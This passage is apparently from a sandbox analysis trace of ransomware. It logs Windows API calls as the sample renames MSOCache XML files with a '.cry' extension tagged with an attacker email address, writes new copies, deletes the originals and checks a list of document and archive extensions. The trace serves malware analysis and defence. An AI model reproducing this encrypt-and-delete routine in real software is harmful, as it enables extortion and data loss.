users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.904] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.905] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.905] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.905] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.905] GetLastError () returned 0x0 [0035.905] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x251f, lpOverlapped=0x0) returned 1 [0035.912] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0035.913] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.913] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.913] SetEndOfFile (hFile=0x190) returned 1 [0035.913] CloseHandle (hObject=0x190) returned 1 [0035.914] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.914] SetEndOfFile (hFile=0x19c) returned 1 [0035.915] CloseHandle (hObject=0x19c) returned 1 [0035.915] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.915] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0035.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.915] lstrlenW (lpString=".doc") returned 4 [0035.915] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString=".docx") returned 5 [0035.915] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.915] lstrlenW (lpString=".pdf") returned 4 [0035.915] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString=".xls") returned 4 [0035.915] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString=".xlsx") returned 5 [0035.915] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.915] lstrlenW (lpString=".ppt") returned 4 [0035.915] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.915] lstrlenW (lpString=".zip") returned 4 [0035.915] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.915] lstrlenW (lpString=".rar") returned 4 [0035.915] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString=".bz2") returned 4 [0035.915] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.915] lstrlenW (lpString=".7z") returned 3 [0035.916] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".dbf") returned 4 [0035.916] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".1cd") returned 4 [0035.916] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".jpg") returned 4 [0035.916] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".doc") returned 4 [0035.916] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString=".docx") returned 5 [0035.916] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.916] lstrlenW (lpString=".pdf") returned 4 [0035.916] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString=".xls") returned 4 [0035.916] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString=".xlsx") returned 5 [0035.916] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.916] lstrlenW (lpString=".ppt") returned 4 [0035.916] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".zip") returned 4 [0035.916] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.916] lstrlenW (lpString=".rar") returned 4 [0035.916] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString=".bz2") returned 4 [0035.916] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.916] lstrlenW (lpString=".7z") returned 3 [0035.916] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.916] lstrlenW (lpString=".dbf") returned 4 [0035.916] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.917] lstrlenW (lpString=".1cd") returned 4 [0035.917] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.917] lstrlenW (lpString=".jpg") returned 4 [0035.917] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.917] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.917] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0035.917] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.918] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1452) returned 1 [0035.918] CloseHandle (hObject=0x19c) returned 1 [0035.918] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0035.918] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.918] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.918] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.918] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.919] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.919] GetLastError () returned 0x0 [0035.919] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0035.926] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.927] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.927] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.927] SetEndOfFile (hFile=0x190) returned 1 [0035.927] CloseHandle (hObject=0x190) returned 1 [0035.927] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.927] SetEndOfFile (hFile=0x19c) returned 1 [0035.928] CloseHandle (hObject=0x19c) returned 1 [0035.928] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.929] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0035.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.929] lstrlenW (lpString=".doc") returned 4 [0035.929] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString=".docx") returned 5 [0035.929] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.929] lstrlenW (lpString=".pdf") returned 4 [0035.929] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString=".xls") returned 4 [0035.929] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString=".xlsx") returned 5 [0035.929] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.929] lstrlenW (lpString=".ppt") returned 4 [0035.929] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.929] lstrlenW (lpString=".zip") returned 4 [0035.929] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.929] lstrlenW (lpString=".rar") returned 4 [0035.929] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString=".bz2") returned 4 [0035.929] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString=".7z") returned 3 [0035.929] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.929] lstrlenW (lpString=".dbf") returned 4 [0035.929] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.929] lstrlenW (lpString=".1cd") returned 4 [0035.929] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.930] lstrlenW (lpString=".jpg") returned 4 [0035.930] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.930] lstrlenW (lpString=".doc") returned 4 [0035.930] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString=".docx") returned 5 [0035.930] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.930] lstrlenW (lpString=".pdf") returned 4 [0035.930] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString=".xls") returned 4 [0035.930] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString=".xlsx") returned 5 [0035.930] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.930] lstrlenW (lpString=".ppt") returned 4 [0035.930] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.930] lstrlenW (lpString=".zip") returned 4 [0035.930] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.930] lstrlenW (lpString=".rar") returned 4 [0035.930] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString=".bz2") returned 4 [0035.930] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.930] lstrlenW (lpString=".7z") returned 3 [0035.930] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.930] lstrlenW (lpString=".dbf") returned 4 [0035.930] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.931] lstrlenW (lpString=".1cd") returned 4 [0035.931] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.931] lstrlenW (lpString=".jpg") returned 4 [0035.931] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.931] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.931] lstrlenW (lpString="Setup.xml") returned 9 [0035.931] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.931] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1872) returned 1 [0035.931] CloseHandle (hObject=0x19c) returned 1 [0035.931] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.931] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.932] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.932] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.932] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.932] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.932] GetLastError () returned 0x0 [0035.932] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x750, lpOverlapped=0x0) returned 1 [0035.933] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x760, lpOverlapped=0x0) returned 1 [0035.934] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.934] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.934] SetEndOfFile (hFile=0x190) returned 1 [0035.934] CloseHandle (hObject=0x190) returned 1 [0035.935] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.935] SetEndOfFile (hFile=0x19c) returned 1 [0035.936] CloseHandle (hObject=0x19c) returned 1 [0035.936] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.936] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.936] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.936] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.936] lstrlenW (lpString=".doc") returned 4 [0035.936] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.936] lstrlenW (lpString=".docx") returned 5 [0035.936] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.936] lstrlenW (lpString=".pdf") returned 4 [0035.936] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.936] lstrlenW (lpString=".xls") returned 4 [0035.936] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.936] lstrlenW (lpString=".xlsx") returned 5 [0035.936] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.936] lstrlenW (lpString=".ppt") returned 4 [0035.936] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.936] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.936] lstrlenW (lpString=".zip") returned 4 [0035.936] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.936] lstrlenW (lpString=".rar") returned 4 [0035.936] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.936] lstrlenW (lpString=".bz2") returned 4 [0035.937] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".7z") returned 3 [0035.937] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString=".dbf") returned 4 [0035.937] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString=".1cd") returned 4 [0035.937] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString=".jpg") returned 4 [0035.937] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString=".doc") returned 4 [0035.937] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".docx") returned 5 [0035.937] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.937] lstrlenW (lpString=".pdf") returned 4 [0035.937] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".xls") returned 4 [0035.937] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".xlsx") returned 5 [0035.937] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.937] lstrlenW (lpString=".ppt") returned 4 [0035.937] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.937] lstrlenW (lpString=".zip") returned 4 [0035.937] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.937] lstrlenW (lpString=".rar") returned 4 [0035.937] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".bz2") returned 4 [0035.937] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.937] lstrlenW (lpString=".7z") returned 3 [0035.937] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.938] lstrlenW (lpString=".dbf") returned 4 [0035.938] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.938] lstrlenW (lpString=".1cd") returned 4 [0035.938] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.938] lstrlenW (lpString=".jpg") returned 4 [0035.938] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.938] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.938] lstrlenW (lpString="GrooveMUI.xml") returned 13 [0035.938] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.939] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=913) returned 1 [0035.939] CloseHandle (hObject=0x19c) returned 1 [0035.939] GetFileAttributesW (lpFileName="C:\\MSOCache\\All 